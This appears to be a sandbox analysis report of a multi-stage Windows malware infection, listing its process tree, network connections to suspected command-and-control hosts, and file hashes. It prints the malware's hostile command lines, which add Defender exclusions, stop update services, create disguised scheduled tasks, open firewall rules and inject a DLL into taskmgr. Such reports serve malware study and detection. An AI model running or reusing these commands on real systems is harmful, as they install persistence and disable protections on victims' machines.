PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 856 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\44B6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2624 wrote to memory of 4644 N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe
PID 2624 wrote to memory of 4644 N/A N/A C:\Users\Admin\AppData\Local\Temp\4824.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a4493012.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 3156 -ip 3156

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3156 -s 584

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5143384.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b5143384.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 584

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1628 -ip 1628

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c0453981.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c0453981.exe

C:\Users\Admin\AppData\Local\Temp\436D.exe

C:\Users\Admin\AppData\Local\Temp\436D.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\WS5OY2lM.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\bB1Ol2hS.exe

C:\Users\Admin\AppData\Local\Temp\44B6.exe

C:\Users\Admin\AppData\Local\Temp\44B6.exe

C:\Users\Admin\AppData\Local\Temp\4563.bat

"C:\Users\Admin\AppData\Local\Temp\4563.bat"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\em6sS5Wk.exe

C:\Users\Admin\AppData\Local\Temp\4777.exe

C:\Users\Admin\AppData\Local\Temp\4777.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\FY0Vk8iU.exe

C:\Users\Admin\AppData\Local\Temp\4824.exe

C:\Users\Admin\AppData\Local\Temp\4824.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 856 -ip 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 388

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\463B.tmp\463C.tmp\463D.bat C:\Users\Admin\AppData\Local\Temp\4563.bat"

C:\Users\Admin\AppData\Local\Temp\4AD4.exe

C:\Users\Admin\AppData\Local\Temp\4AD4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1ZO32QK3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1476 -ip 1476

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1476 -s 404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4388 -ip 4388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 2668 -ip 2668

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2668 -s 600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 540

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2kf426Vj.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa26e946f8,0x7ffa26e94708,0x7ffa26e94718

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa26e946f8,0x7ffa26e94708,0x7ffa26e94718

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,3338189018443022165,8047999338253262420,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,3338189018443022165,8047999338253262420,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\86D5.exe

C:\Users\Admin\AppData\Local\Temp\86D5.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\B836.exe

C:\Users\Admin\AppData\Local\Temp\B836.exe

C:\Users\Admin\AppData\Local\Temp\B9AE.exe

C:\Users\Admin\AppData\Local\Temp\B9AE.exe

C:\Users\Admin\AppData\Local\Temp\BBC3.exe

C:\Users\Admin\AppData\Local\Temp\BBC3.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5408 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5520 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,12968447658721337842,5436463566782174213,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
RU 5.42.65.80:80 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 tak.soydet.top udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 31.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.1:80 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 5.42.92.211:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 51.124.78.146:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 51.124.78.146:443 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 9216b970-75ab-42b5-8ecd-b10e6bfc9113.uuid.cdntokiog.studio udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 104.21.61.162:80 tcp
US 104.21.61.162:80 tcp
US 104.21.61.162:80 tcp
US 104.21.61.162:80 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v7946245.exe

MD5 b671eaf3ac451a0b31be2410a9ea5531
SHA1 a7b6d74a5e2d6b82c8c48c2de8c2bffc4dc20b0e
SHA256 a77d5f68052550912ad37e82bc67c3ea4b7a8c37bc637e91d2c7831861796ea0
